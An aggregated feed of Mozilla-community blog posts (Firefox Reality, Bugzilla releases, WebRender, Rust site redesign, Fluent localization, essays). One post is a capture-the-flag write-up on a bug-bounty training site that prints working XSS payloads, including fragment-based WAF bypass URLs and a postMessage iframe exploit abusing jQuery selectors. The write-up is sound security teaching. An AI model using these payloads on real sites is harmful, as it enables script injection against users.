I’ve discussed and linked to articles about the advantages of splitting patches into small pieces to the point that I don’t feel the need to reiterate it here. This is a common approach at Mozilla, especially (but not just) in Firefox engineering, something the Engineering Workflow group is always keeping in mind when planning changes and improvements to tools and processes. Many Mozilla engineers have a particular approach to working with small diffs, something, I’ve realized over time, that seems to be pretty uncommon in the industry: the stacking of commits together in a logical series that solves a particular problem or implements a specific feature.

Mozilla VR BlogFirefox Reality update supports 360 videos and 7 additional languages

Firefox Reality update supports 360 videos and 7 additional languages

Firefox Reality 1.1 is now available for download in the Viveport, Oculus, and Daydream app stores. This release includes some major new features, including localization to seven new languages (including voice search support), a new dedicated theater viewing mode, bookmarks, 360 video support, and significant improvements to the performance and quality of our user interface.

We also continue to expand the Firefox Reality content feed, and are excited to add cult director/designer Keiichi Matsuda’s video series, including his latest creation, Merger.

Keiichi’s work explores how emerging technologies will impact everyday life in the future. His acclaimed 2016 film HYPER-REALITY was a viral success, presenting a provocative and kaleidoscopic vision of the future city saturated in media. It was an extension and re-imagining of his earlier concept films made in 2010, also presented here. His new short film, Merger, is shot in 360 and explores the future of work, automated corporations and the cult of productivity. We follow an elite tele-operator fighting for her economic survival, in search of the ultimate interface.

New Features:

  • Improved theater mode with 360 video playback support
  • Additional localization: Chinese (Mandarin - simplified and traditional), French, Italian, German, Spanish, Japanese, Korean
  • Expanded voice search support to new localized languages above
  • Bookmarks
  • Automatic search and domain suggestions in URL bar

Improvements/Bug Fixes:

  • Improved 2D UI performance

Full release notes can be found in our GitHub repo here.

Looking ahead, we are exploring content sharing and syncing across browsers (including bookmarks), multiple windows, tab support, as well as continuing to invest in baseline features like performance. We appreciate your ongoing feedback and suggestions — please keep it coming!

Firefox Reality is available right now.

Download for Oculus
(supports Oculus Go)

Download for Daydream
(supports all-in-one devices)

Download for Viveport (Search for “Firefox Reality” in Viveport store)
(supports all-in-one devices running VIVE Wave)

Mozilla B-Teamhappy bmo push day!

happy bmo push day!

We did another release today.

release tag

the following changes have been pushed to bugzilla.mozilla.org:

  • [1510427] improve fulltext completion for real names
  • [1508261] Closing DevRel sponsorship form on Bugzilla and updating Wiki page
  • [1508385] Remove links to input.mozilla.org from Guided Bug Entry flow
  • [1510653] API method for returning users profile information when given a valid oauth2…

View On WordPress

Daniel PocockConnecting software freedom and human rights

2018 is the 70th anniversary of the Universal Declaration of Human Rights.

Over the last few days, while attending the UN Forum on Business and Human Rights, I've had various discussions with people about the relationship between software freedom, business and human rights.

In the information age, control of the software, source code and data translates into power and may contribute to inequality. Free software principles are not simply about the cost of the software, they lead to transparency and give people infinitely more choices.

Many people in the free software community have taken a particular interest in privacy, which is Article 12 in the declaration. The modern Internet challenges this right, while projects like TAILS and Tor Browser help to protect it. The UN's 70th anniversary slogan Stand up 4 human rights is a call to help those around us understand these problems and make effective use of the solutions.

We live in a time when human rights face serious challenges. Consider censorship: Saudi Arabia is accused of complicity in the disappearance of columnist Jamal Khashoggi and the White House is accused of using fake allegations to try and banish CNN journalist Jim Acosta. Arjen Kamphuis, co-author of Information Security for Journalists, vanished in mysterious circumstances. The last time I saw Arjen was at OSCAL'18 in Tirana.

For many of us, events like these may leave us feeling powerless. Nothing could be further from the truth. Standing up for human rights starts with looking at our own failures, both as individuals and organizations. For example, have we ever taken offense at something, judged somebody or rushed to make accusations without taking time to check facts and consider all sides of the story? Have we seen somebody we know treated unfairly and remained silent? Sometimes it may be desirable to speak out publicly, sometimes a difficult situation can be resolved by speaking to the person directly or having a meeting with them.

Being at the United Nations provided an acute reminder of these principles. In parallel to the event, the UN were hosting a conference on the mine ban treaty and the conference on Afghanistan, the Afghan president arriving as I walked up the corridor. These events reflect a legacy of hostilities and sincere efforts to come back from the brink.

A wide range of discussions and meetings

There were many opportunities to have discussions with people from all the groups present. Several sessions raised issues that made me reflect on the relationship between corporations and the free software community and the risks for volunteers. At the end of the forum I had a brief discussion with Dante Pesce, Chair of the UN's Business and Human Rights working group.

Best free software resources for human rights?

Many people at the forum asked me how to get started with free software and I promised to keep adding to my blog. What would you regard as the best online resources, including videos and guides, for people with an interest in human rights to get started with free software, solving problems with privacy and equality? Please share them on the Libre Planet mailing list.

Let's not forget animal rights too

Are dogs entitled to danger pay when protecting heads of state?

The Firefox FrontierHow to Use Firefox Reality on the Oculus Go VR Headset

Virtual reality headsets are one of the hottest gifts of the season, but without an internet browser built for virtual reality the experience could fall flat. Enter, Firefox Reality, an … Read more

The post How to Use Firefox Reality on the Oculus Go VR Headset appeared first on The Firefox Frontier.

Mozilla B-Teamhappy bmo push days

a whole bunch of updates (including last week’s)

Last week’s pushes didn’t get posted because we had a few bug fixes, so below is yesterday’s push + last weeks, in reverse chronological order.

release tag

the following changes have been pushed to bugzilla.mozilla.org:

  • [1484892] Modify EditComments extension to let anyone use it conditionally and support inline editing
  • [1354589] Implement OAuth2 on BMO
  • [1452018] Remove remaining Firefox OS and…

View On WordPress

Mozilla Open Innovation TeamPrototyping with Intention

In our first post of this series we introduced why, and a bit of how, we’re applying experience design to our Open Innovation projects and community collaboration. An integral part of experience design is growing an idea from a concept to a full-fledged product or service. In getting from one to the other, thinking and acting prototypically can make a significant difference in overall quality and sets us up for early, consistent feedback. We are then able to continually identify new questions and test our hypotheses with incremental work. So, what do we actually mean by thinking and acting prototypically?

<figcaption>Common Voice started as a proof of concept prototype and has been collaboratively iterated over the past year</figcaption>

Be Open to Change

At the start of any project our Open Innovation team concepts with the intention that things will change. Whether it be wireframe prototypes or coded experiments, iteration is inevitable. First ideas are often far from perfect… it’s with help from new or returning contributors and collaborating project teams that we’re able to refine initial ideas more readily and efficiently. How? Through feedback loops designed with tools such as Discourse, GitHub, contact forms, on-site surveys and remote testing. Our overall goal being: Release assumptions early and learn from those engaging with the concept. In this way we set our experiences up for incremental, data influenced iteration.

<figcaption>Workshop paper prototypes became coded production prototypes over a 6 week stretch</figcaption>

To continue with our example of Common Voice, we see that this approach was applied in moving from paper prototype to first production prototype. The learnings and feedback from the design sprint exercises helped us realize the need for storytelling and a human interaction experience that would resonate with, well, humans. To achieve this we set out over a 6 week phase to create the experience via wireframes, basic UI design and code implementation. With the help of our community members we were gratefully able to QA the experience as we released it.

Iterate Consistently and Incrementally

With a working prototype out in the wild our team sets their focus on observing and gathering info about performance and usability. In addition to 250+ technical contributors that file issues with feature requests and bug fixes, for Common Voice, our team made time to evaluate the prototype from a usability perspective.

<figcaption>The Common Voice GitHub repository is a hub of collaboration between contributors and Mozilla staff</figcaption>

About three months in we performed a UX assessment reviewing initial prototype designs against what actually made it to production code. Comparing this against feature requests from product stakeholders and contributors, our experience design goal was to understand changes most needed to improve usability and engagement across the site.

This assessment information, combined with usability testing, supported decisions for improvements such as:

  1. Adding keyboard shortcuts to the contribution experience
  2. Improving prompts and progress counters when recording and listening to sentences
  3. Site navigation layout from sidebar to top header
  4. Optimization for responsiveness across viewports
  5. Providing clear calls to action for contribution on the homepage
<figcaption>The next iteration of the MVP prototype based on usability feedback and contributor feature requests</figcaption>

Workshop New Questions

Completing the incremental work allows us to find our way to new questions and needs as a product or service evolves. Along with the feature requests and smaller production needs required of a live prototype, there are larger project strategy queries that can come to light. These are the types of queries you can only learn from experimenting.

Releasing our first dataset for Common Voice was the result of one such experiment. An achievement in itself, it also proved that our concept had merit. The prototype was working! Despite this, in equal measure it also highlighted quality gaps in our data: it could be more spontaneous, such as two humans naturally conversing would allow. It also reaffirmed something we already knew: our data could be far more diverse. Meaning more gender, accent, dialect and overall language diversity. There is an increasing need for a large, publicly open multi-language voice dataset. This has been clear from the start of this project. True to our desire to think and act prototypically we had to choose a single language to focus resources and first prove out the concept. With the successful release of the first dataset we were ready to take on some new questions and keep iterating:

  1. How might we enable a multi-language experience?
  2. How might we increase the quantity and quality of our contributions?

Having already gained integral insights for Common Voice via an experience workshop, we planned another. In January of 2018 we brought together commercial and academic partners to join Mozilla team members, including various expert influencers, to help brainstorm and ideate potential solutions for these questions. The common interest of the attendees? Seeing this unique project succeed. Many had come up against these types of questions in different contexts across their work and were keen to ideate on ways to improve the site.

<figcaption>Multi-language experience wireframes result from a collaborative experience journey and feature prioritization</figcaption>

Workshopping the first question meant determining requirements (what does success look like) and mapping experience journeys to achieve those requirements (see the above image). What resulted was this realization: we have big, multi-feature dreams for the overall Common Voice multi-language experience. To make those dreams a reality we first focused on what was most needed first, providing people a way to contribute in their desired language(s). Other features, like building dedicated language pages and creating a community dashboard, are built into our roadmap. This feature prioritization enabled us to deliver a multi-language experience in May of this year. Reaching this milestone has made the second Common Voice dataset release — which will be our first multi-language dataset release — achievable by the end of 2018.

<figcaption>Workshop session on how we might increase the quantity and quality of voice contributions for Common Voice</figcaption>

In the area of increasing quantity and quality of contributions, the workshop introduced concepts for improving spontaneous speech capture through potential, future experiments. Some examples include enabling spontaneous, conversational style recording sessions on the website; integrations with existing wearables for set session lengths; and a roaming event pop-up with recording booths. This ideation session even lingered in our minds well past the workshop and has prompted thoughts around an opt-in style recording space in collaboration with Hubs, a virtual spaces experiment by Mozilla’s Mixed Reality team.

<figcaption>Relaunched in August 2018 as a portal, the contribution experience is now multi-language enabled</figcaption>

For the current online experience we solidified user journeys that enabled immediate impact of the website and began laying foundation that would enable more robust future experiments. Some of these, such as the new contribution experience and homepage, we’ve already seen land in production as iterations of the Common Voice MVP prototype. Other feature enhancements, like a new profile login experience — which enables contributors to save their progress across multiple languages and view that progress via a new dashboard — have launched this week and are undergoing collaborative QA with our communities. The goal of these features being to improve the human experience while increasing the quality and quantity of voice contributions.

<figcaption>Prototyping continues with the new stat dashboard for Common Voice</figcaption>

With Common Voice we see through incremental, open iteration that our team has been able to intentionally grow from the early prototype. In doing so we are actively working to create more avenues for contribution regardless of language, device or location. Our next post will take a deeper look at how we’re empowering contributions of all sizes, in Common Voice and elsewhere, for Open Innovation.


Prototyping with Intention was originally published in Mozilla Open Innovation on Medium, where people are continuing the conversation by highlighting and responding to this story.

Mozilla B-Teamhappy bmo push day!

happy bmo push day!

release tag

the following changes have been pushed to bugzilla.mozilla.org:

  • [1505793] Add triage owner in /rest/bug
  • [1506754] Group Membership report “include disabled users” doesn’t seem to work
  • [1328665] Two issues with Project Review form for RRAs
  • [1505050] make the request nagging script more robust
  • [1504325] Mozilla Gear Request form broken: The requested format gear does not exist with a…

View On WordPress

Mozilla GFXWebRender newsletter #32

Hey there! Did you hear this? Me neither. The 32nd episode of WebRender’s newsletter made its way to your screen without a sound. In the previous episode, nic4r asked in the comments section a lot of technical and interesting questions. There is a lot to cover so I’ll start by answering a couple here by way of introduction and will go through the other questions in later posts.

How do the strategies for OMTP and WebRender relate? Would OMTP have benefits for expensive blob rasterization since that used Skia?

OMTP, for off-main-thread painting, is a project completely separate from WebRender that was implemented by Ryan. Without WebRender, painting used to happen on the main thread (the thread that runs the JS event loop). Since this thread is often the busiest, moving things out of it, for example painting, is a nice win for multi core processors since the main thread gets to go back to working on JS more quickly while painting is carried out in parallel. This work is pretty much done now and Ryan is working on project Fission.

What about WebRender? WebRender moved all of painting off of the main thread by default. The main thread translates Gecko’s displaylist into a WebRender displaylist which is sent to the GPU process and the latter renders everything. So WebRender and OMTP, while independent projects both fulfill the goal of OMTP which was to remove work from the main thread. OMTP can be seen as a very nice performance win while waiting for WebRender.

Expensive blob rasterization is already carried out asynchronously by the scene builder thread (helped by a thread pool) which means we get with blob rasterization the same property that OMTP provides. This is a good segue to another question:

How do APZ and async scene building tie together?

APZ (for Asynchronous Panning and Zooming) refers to how we organize the rendering architecture in such a way that panning and zooming can happen at a frame rate that is decoupled from the expensive parts of the rendering pipeline. This is important because the perceived performance of the browser largely relies on quickly and smoothly reacting to some basic interactions such as scrolling.

With WebRender there are some operations that can cost more than our frame budget such as scene building and blob image rasterization. In order to keep the nice and smooth feel of APZ we made these asynchronous. In practice this means that when layout changes happen, we re-build the scene and perform the rasterization of blob images on the side while still responding to input events so that we can continue scrolling the previous version of the scene until the new one is ready. I hope this answers the question. Async scene building is one of the ways we “preserve APZ” so to speak with WebRender.

Notable WebRender and Gecko changes

  • Jeff improved performance when rendering text by caching nsFontMetrics references.
  • Jeff removed some heap allocations when creating clip chains.
  • Jeff wrote a tool to find large memcpys generated by rustc.
  • Dan continued working on scene building performance.
  • Kats is helping with the AMI upgrade for Windows.
  • Kats Fixed crashes due to large draw target allocations.
  • Kats Got captures to work on Android.
  • Kvark removed non-zero origin of reference frames stacking contexts and iframes.
  • Kvark made a couple of memcpy optimizations.
  • Kvark fixed replaying a release capture with a debug version of wrench.
  • Kvark prevented tiled blob images from making captures unusable.
  • Matt Improved the performance of displaylist building.
  • Andrew fixed a rendering issue with animated images.
  • Andrew fixed a crash.
  • Glenn landed all of the primitive interning and picture caching patches, will probably enable picture caching soon. (1), (2), (3), (4), (5), (6), (8), (9) and (10). phew!
  • Glenn added a scratch buffer for transient data during frame building.
  • Glenn reduced the size of BrushPrimitive.
  • Glenn added support for float keys in interning.
  • Glenn fixed a bug with the update of uv rects in the texture cache.
  • Nical and Gankro simplified tracking image dirty rects in WebRender.
  • Nical stored tile dirty rects in local space.
  • Nical refactored the blob image related APIs to be able to express some of the things we need for blob image re-coordination.
  • Nical fixed a crash.
  • Nical fixed a memory leak.
  • Sotaro fixed a WebGL crash when Wayland is enabled.
  • Sotaro fixed a rendering issue with SurfaceTexture on Android.
  • Sotaro fixed an intermittent failure related to frame synchronization.
  • Doug put document splitting up for review.

Ongoing work

  • Bobby is working on improving the shader cache.
  • Nical is working on blob image re-coordination.
  • A lot of people in the team keep investigating performance with a focus on scene building and slow memcpys generated by rustc when medium/large structures are moved on the stack.
  • Kats keeps improving the situation on Android.
  • Lee continues improving font rendering.
  • Markus is getting profiling with full symbol information to work on android.

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

The Firefox FrontierFirefox fights for you

It’s been a year here on the internet, to say the least. We’ve landed in a place where misinformation—something we fought hard to combat—is the word of the year, where … Read more

The post Firefox fights for you appeared first on The Firefox Frontier.

The Rust Programming Language BlogA new look for rust-lang.org

Before 1.0, Rust had a reputation for changing the language on a near-daily basis. By contrast, the website has looked pretty much the same. Here’s the first version of rust-lang.org, seven years ago (courtesy of the WayBack Machine):

rust website in 2011

In 2014, three years later:

rust website in 2014

If you visit https://rust-lang.org today, you'll see this:

rust website in 2018

Over time, we’ve grown to love it. It’s simple. Minimal. Familiar.

Improving the content

But we can always do better. For example, the website suffers from what we call “the fireflower problem.” First formulated by Kathy Sierra, and made into an image by Samuel Hulick:

the fireflower

We want Mario to use Rust, the fireflower, and turn into the ever-awesome Fire Mario. But there’s a corollary here: it’s better to say “we will make you into Fire Mario” than it is “we sell fire flowers.”

(As an aside, we had a community discussion on this topic back in 2016.)

In other words, this list:

  • zero-cost abstractions
  • move semantics
  • guaranteed memory safety
  • threads without data races
  • trait-based generics
  • pattern matching
  • type inference
  • minimal runtime
  • efficient C bindings

doesn’t explain what you can do with Rust, which leads people to say “Rust seems neat, but I don’t know what I would actually use it for.”

Improving the style

We also like the minimalist style of the current site, but it also may be too minimal. Furthermore, it has no room to grow; we have more than just rust-lang.org these days. We wanted a style that we could use to unify all of the websites that we maintain in the Rust project; crates.io being a big one. Its “pool table” design feels extremely different than rust-lang.org, which is confusing.

Doing this requires care, as we don’t want to make the website huge and complicated, but at the same time, using more than black and blue might be nice.

The beta

Today, we’d like to announce a beta of the new rust-lang.org. If you go to https://beta.rust-lang.org, you’ll see this:

beta rust website

Its fresh visual design gives us a lot more flexibility in how we get information across. It retains the minimalist spirit of the old site, while adding some bold color and visual variety.

We hope you like it as much as we do!

Some highlights

The new site puts the “why Rust?” question front-and-center, and includes dedicated pages for the four application domains we targeted in 2018:

  • Embedded devices
  • WebAssembly
  • CLI apps
  • Network services

We have also revised the slogan. Historically, it has been:

Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety.

Like the bullet list of features, this doesn't convey what you can do with Rust. So we've updated the slogan:

Rust: The programming language that empowers everyone to become a systems programmer.

We're still not sure we love the term "systems programming," as it seems like it means something different to everyone, but this iteration is significantly better than the old one. Even if people have different ideas about what "systems programming" means, they at least have some idea. "guarantees thread safety," not so much.

Future work

There’s still more work to do:

  • Some information on the old site, has not yet been ported over.
  • Translations have regressed. We’re working on adding the proper infrastructure here, and hope to be able to start accepting translations by the end of the year.
  • We need more polish and testing in a general sense.

Please file an issue with any feedback you have! We’re also looking for people with abilities of all kinds to help maintain the site, and especially people with design, CSS, and marketing skills. If you’d like to get involved, please email us!

We’d like to ship this new site on December 6, with the release of Rust 2018. Thank you for giving it a try before then, so we can work out any bugs we find!

The Mozilla BlogMozilla Funds Research Grants in Four Areas

We’re happy to announce the recipients for the 2018 H2 round of Mozilla Research Grants. In this tightly focused round, we awarded grants to support research in four areas: Web of the Things, Core Web Technologies, Voice/Language/Speech, and Mixed Reality. These projects support Mozilla’s mission to ensure the Internet is a global public resource, open and accessible to all.

Web of Things

We are funding University of Washington to support Assistant Professor of Interaction Design Audrey Desjardins in the School of Art + Art History + Design. Her project, titled (In)Visible Data: How home dwellers engage with domestic Web of Things data, will provide a detailed qualitative description of current practices of data engagement with the Web of Things in the home, and offer an exploration of novel areas of interest that are diverse, personal, and meaningful for future WoT data in the home.

Core Web Technologies

Mozilla has been deeply involved in creating and releasing AV1: an open and royalty-free video encoding format. We are funding the Department of Control and Computer Engineering at Politecnico di Torino. This grant will support the research of Assistant Professor Luca Ardito and his project Algorithms clarity in Rust: advanced rate control and multi-thread support in rav1e. This project aims to understand how the Rust programming language improves the maintainability of code while implementing complex algorithms.

Voice, language and speech

We are funding Indiana University Bloomington to support Suraj Chiplunkar’s project Uncovering Effective Auditory Feedback Methods to Promote Relevance Scanning and Acoustic Interactivity for Users with Visual Impairments. This project explores better ways to allow people to listen to the web. Suraj Chiplunkar is a graduate student in the Human-Computer Interaction Design program as part of the School of Informatics, Computing, and Engineering, and is working with Professor Jeffrey Bardzell.

Mixed Reality

Mozilla has a strong commitment to open standards in virtual and augmented reality, as evidenced by our browser, Firefox Reality. We’re happy to support the work of Assistant Professor Michael Nebeling at the University of Michigan’s School of Information and his project Rethinking the Web Browser as an Augmented Reality Application Delivery Platform. This project explores the possibilities for displaying elements from multiple augmented reality apps at once, pointing the way to a vibrant, open mixed reality ecosystem.

The Mozilla Research Grants program is part of Mozilla’s Emerging Technologies commitment to being a world-class example of inclusive innovation and impact culture, and reflects Mozilla’s commitment to open innovation, continuously exploring new possibilities with and for diverse communities. We plan to open the 2019H1 round in Spring 2019: see our Research Grant webpage for more details and to sign up to be notified when applications open.

Congratulations to all of our applicants!

Thumbnail image by Audrey Dejardins

The post Mozilla Funds Research Grants in Four Areas appeared first on The Mozilla Blog.

The Mozilla BlogA Statement About Facebook and Color of Change

Color of Change is one of the leading civil rights organizations of our time, and we at Mozilla have been immensely privileged to collaborate with them on the Ford-Mozilla Open Web Fellows initiative and on a number of areas around internet health.

Their work is pioneering, inspiring, and has been crucial for representing the voices of a key community in debates about the internet. As a technology community, we need more and diverse voices in the work to make the internet open, accessible, and safe for all.

Recently, some concerning allegations regarding practices by Facebook have been raised in high-profile media coverage, including a New York Times article. We are pleased that Facebook is meeting with Color of Change to discuss these issues. We hope Facebook and Color of Change can identify ways that we, as a tech community, can work together to address the biggest challenges facing the internet.

The post A Statement About Facebook and Color of Change appeared first on The Mozilla Blog.

Wladimir PalantBBN challenge resolutions: "A properly secured parameter" and "Exploiting a static page"

BugBountyNotes is quickly becoming a great resource for security researches. Their challenges in particular are a fun way of learning ways to exploit vulnerable code. So a month ago I decided to contribute and created two challenges: A properly secured parameter (easy) and Exploiting a static page (medium). Unlike most other challenges, these don’t really have any hidden parts. Pretty much everything going on there is visible, yet exploiting the vulnerabilities still requires some thinking. So if you haven’t looked at these challenges, feel free to stop reading at this point and go try it out. You won’t be able to submit your answer any more, but as both are about exploiting XSS vulnerabilities you will know yourself when you are there. Of course, you can also participate in any of the ongoing challenges as well.

Still here? Ok, I’m going to explain these challenges then.

What’s up with that parameter?

We’ll start with the easier challenge first, dedicated to all the custom URL parsers that developers seem to be very fond of for some reason. The client-side code makes it very obvious that the “message” parameter is vulnerable. With the parameter value being passed to innerHTML, we would want to pass something like <img src=dummy onerror=alert("xss")> here (note that innerHTML won’t execute <script> tags).

But there is a catch of course. Supposedly, the owners of that page discovered the issue. But instead of putting resources into fixing it, they preferred a quick band-aid and configured a Web Application Firewall to stop attacks. That’s the PHP code emulating the firewall here:

 if (preg_match('/[^\\w\\s-.,&=]/', urldecode($_SERVER['QUERY_STRING'])))
    exit("Invalid parameter value");

The allowed character set here is the bare minimum to allow the “functionality” to work, and I feel really sorry for anybody who tried to solve the challenge by attacking this “firewall.” The only way around this filter is to avoid going through it in the first place.

It might not be immediately obvious but the URL parser used by the challenge is flawed:

      function getParam(name)
      {
        var query = location.href.split("?")[1];
        if (!query)
          return null;

        var params = query.split("&");
        for (var i = 0; i < params.length; i++)
        {
          var parts = params[i].split("=");
          if (parts[0] == name)
            return decodeURIComponent(parts[1]);
        }
        return null;
      }

Do you see the issue? Yes, it assumes that anything following the question mark is the query string. What it forgets about is the fragment part of the URL, the one following the # symbol. Any parameters in the fragment will be parsed as well. This wouldn’t normally be a big deal, but the fragment isn’t sent to the server! This means that no server-side firewall can see it, so it cannot stop attacks coming from this direction.

So here are some URLs that will trigger the XSS vulnerability here:

  • https://www.bugbountytraining.com/challenges/challenge-10.php#?message=%3Cimg%20src%3Ddumm%20onerror%3Dalert(%22xss%22)%3E
  • https://www.bugbountytraining.com/challenges/challenge-10.php?message=#%3Cimg%20src%3Ddumm%20onerror%3Dalert(%22xss%22)%3E

Of course, answers submitted by BBN users contained quite a few more variations. But what really surprised me was just how many people managed to solve this challenge without understanding how their solution worked. It seems that they attacked the Web Application Firewall blindly and just assumed that the firewall treated the # character specially for some reason.

Let’s close with an advise for all developers out there: don’t write your own URL parser. Even though URL parsing appears simple, there are many fall traps. If you need to do it, use the URL object. If you need to parse query parameters, use the URLSearchParams object. Even in non-browser environments, there are always well-tested URL parsers already available.

The long route to exploiting a message handler

The other challenge has no server side whatsoever, it’s merely a static web page. And the issue with that page should also be fairly obvious: it listens to message events. When browsers added window.postMessage() API as a means of cross-domain communication, the idea was that any recipient would always check event.origin and reject unknown sources. But of course, many websites fail to validate the message sender at all or go for broken validation schemes. It is no different for this challenge.

Instead of validating the sender, this page validates the recipient: the recipient stated in the message has to match the page’s window name. Now the window name can be easily set by the attacker, e.g. by setting a name for the frame that this page is loaded into. The difficulty here is that the page will only consider certain recipients as “valid,” namely those where its own Buzhash variant results in 0x70617373 (or as a string: “pass”).

And that hash function is mean: no matter the input, the two bytes in the middle will always be NUL bytes! At least that’s the case as long as you constrain yourself to the ASCII character set. Once you start playing around with Unicode, the desired answer actually becomes possible. A bit of experimentation gives me "\x70\x61\u6161\0\0\0\0\u7373" as a valid recipient. But because NUL bytes in the <iframe name> attribute won’t work, I had to experiment a bit more to find a somewhat less obvious solution: "\x70\x10\x10\x10\x10\u6161\u6100\u7373". Some BBN users solved this issue more elegantly: while NUL bytes in attributes don’t work, using them when setting iframe.name property works just fine. One submission also used Microsoft Z3 theorem prover instead of mere experimentation to find a valid recipient.

Once we managed to get the page to accept our message, what can we do then? Not a lot, we can make the page create a custom event for us. But there are no matching event listeners! That is, until you realize that jQuery’s ajaxSuccess callback is actually a regular event handler. So we can trigger that callback.

But the callback merely sets element text, it doesn’t use innerHTML or its jQuery equivalent. So not vulnerable? No, setting text is unproblematic. But this code selecting the element is:

$(data.selector)

The jQuery constructor is typically called with a selector. However, it supports a large number of different calling conventions. In particular, it (and many other jQuery methods) can be called with HTML code as parameter. This can lead to very non-obvious security issues as I pointed out a few years ago. Here, passing some HTML code as “selector” will allow the attacker to run JavaScript code.

Here is my complete solution:

<script>
  window.onload = function()
  {
    var frame = document.getElementById("frame");
    frame.contentWindow.postMessage({
      type: "forward",
      event: "ajaxSuccess",
      selector: "<img src=x onerror=alert(document.domain)>",
      recipient: "\x70\x10\x10\x10\x10\u6161\u6100\u7373"
    }, "*");
  };
</script>
<iframe id="frame" src="https://www.bugbountytraining.com/challenges/challenge-8.html" name="&#x70;&#x10;&#x10;&#x10;&#x10;&#x6161;&#x6100;&#x7373;"></iframe>

This is only one way of demonstrating the issue of course, and some of the submissions from BBN users were more elegant than what I came up with myself.

Robert O'CallahanCapitalism, Competition And Microsoft Antitrust Action

Kevin Williamson writes an ode to the benefits of competition and capitalism, one of his themes being the changing fortunes of Apple and Microsoft over the last two decades. I'm mostly sympathetic, but in a hurry to decry "government intervention in and regulation of the part of our economy that is, at the moment, working best", he forgets or neglects to mention the antitrust actions brought by the US government against Microsoft in the mid-to-late 1990s. Without those actions, there is a high chance things could have turned out very differently for Apple. At the very least, we do not know what would have happened without those actions, and no-one should use the Apple/Microsoft rivalry as an example of glorious laissez-faire capitalism that negates the arguments of those calling for antitrust action today.

Would Microsoft have invested $150M to save Apple in 1997 if they hadn't been under antitrust pressure since 1992? In 1994 Microsoft settled with the Department of Justice, agreeing to refrain from tying the sale of other Microsoft products to the sale of Windows. It is reasonable to assume that the demise of Apple, Microsoft's only significant competitor in desktop computer operating systems, would have increased the antitrust scrutiny on Microsoft. At that point Microsoft's market cap was $150B vs Apple's $2B, so $150M seems like a cheap and low-risk investment by Gates to keep the US government off his back. I do not know of any other rational justification for that investment. Without it, Apple would very likely have gone bankrupt.

In a world where the United States v. Microsoft Corporation (2001) antitrust lawsuit didn't happen, would the iPhone have been as successful? In 1999 I was so concerned about the potential domination of Microsoft over the World Wide Web that I started making volunteer contributions to (what became) Firefox (which drew me into working for Mozilla until 2016). At that time Microsoft was crushing Netscape with superior engineering, lowering the price of the browser to zero, bundling IE with Windows and other hardball tactics that had conquered all previous would-be Microsoft competitors. With total domination of the browser market, Microsoft would be able to take control of Web standards and lead Web developers to rely on Microsoft-only features like ActiveX (or later Avalon/WPF), making it practically impossible for anyone but Microsoft to create a browser that could view the bulk of the Web. Web browsing was an important feature for the first release of the iPhone in 2007; indeed for the first year, before the App Store launched, it was the only way to do anything on the phone other than use the built-in apps. We'll never know how successful the iPhone would have been without a viable Web browser, but it might have changed the competitive landscape significantly. Thankfully Mozilla managed to turn the tide to prevent Microsoft's total browser domination. As a participant in that battle, I'm convinced that the 2001 antitrust lawsuit played a big part in restraining Microsoft's worst behavior, creating space (along with Microsoft blunders) for Firefox to compete successfully during a narrow window of opportunity when creating a viable alternative browser was still possible. (It's also interesting to consider what Microsoft could have done to Google with complete browser domination and no antitrust concerns.)

We can't be sure what the no-antitrust world would have been like, but those who argue that Apple/Microsoft shows antitrust action was not needed bear the burden of showing that their counterfactual world is compelling.

Mozilla Localization (L10N)Multilingual Gecko Status Update 2018.2

Welcome to the third edition of Multilingual Gecko Status Update!

In the previous update we covered the work which landed in Firefox 59 and Firefox 60.

At the time, we’ve been finalizing the platform work to support Fluent localization system, and we were in the middle of migration of the first Firefox UI component – Preferences – to it.

Today, we’ll pick up right where we left off!

Firefox 61 (June)

Firefox 61 fits into the trend of things calming down in Intl – and it’s a great news! It means that we are reaching platform maturity after all the groundbreaking refactors in 2017, and we all can focus on the work on top of the modules, rather than playing whack-a-mole fixing bugs and adding missing features.

The biggest platform change is really just an update to ICU 61 which Andre landed in March and my work on adding mozIntl.RelativeTimeFormat and mozIntl.getLocaleDisplayNames.

The former gave us a stable unified API for presenting relative time (such as “In 5 minutes” or “10 days ago”) while the latter unified how we present language, region and combinations of those in our user interface based on the Unicode CLDR representation (example: “English (United States)”).

As we explained in my earliest posts, one of the things we’re particularly proud of is that we go the extra mile to use every such opportunity to not only fix the immediate Firefox UI need, but also push such proposals for standardization and in result make the Web Platform more complete.

In this case, Intl.RelativeTimeFormat has been proposed and thanks to amazing work by Daniel Ehrenberg is now in Stage 3 and soon will be exposed to all web developers in all browsers! Intl.getLocaleDisplayNames is less mature but the work on it just picked up.

Firefox migration to Fluent reached its next milestone moving from just a couple messages to over 100 Fluent messages in Firefox!

Notable changes [intl module]:

Firefox 62 (September)

Another calm cycle! The biggest feature was the introduction of the pseudolocalization in Firefox which I blogged about, and landing of the developer documentation.

The documentation has been insanely useful in distributing knowledge and helping engineers feel more comfortable working with the new stack, and we’re very happy we reached a stage where landing a documentation is the big news 🙂

In the Fluent land we spent the March-May timeframe moving from a 100 messages to 500 Fluent messages in Firefox!

Notable changes [intl module]:

Firefox 63 (October)

This cycle was quite similar to the previous one, with a bulk of work going into regular maintenance and cleanups.

For my work, the trend is to start integrating Fluent deeper into Gecko with more work around L10nRegistry v1 limitations and getting deeper DOM integration to improve XUL performance.

In this cycle he landed a XPCOM mozIDOMLocalization API which allows us to call Fluent from C++ and was required for a bigger change that we landed in Firefox 64.

One new theme is Kris Maglione who started working on reducing the performance and memory overhead coming from the old StringBundle API (used for .properties). With all the new work centralized around Fluent, but with a large portion of our strings still using StringBundle, it becomes a great target for optimizations by cutting out everything we don’t use and now we know – we never will.

Notable changes [intl module]:

Firefox 64 (December)

This release, is still getting stabilized and will get released in December, but the work cycle on it happened between September and October, so we can already provide you an account of that work!

Besides of a regular stack of cleanups coming from Henri and me, we’ve seen Ehsan Akhgari taking over from Kris to remove more lines of unused code.

The really big change was the introduction of DocumentL10n API which is a C++ API with its own WebIDL tightly integrated into the very core of DOM module in Gecko – nsIDocument.

Before that Fluent lived in Gecko in some form of a glorified javascript library. While it is Fluent’s goal to target the web platform, Firefox UI is inherently different from the web content and benefits from better integration between the DOM and its localization component.

This change allowed us to better integrate localization into the document’s life cycle, but what’s even more important, it allowed us to expose Fluent to documents that usually do not have special privileges and could not access Fluent before.

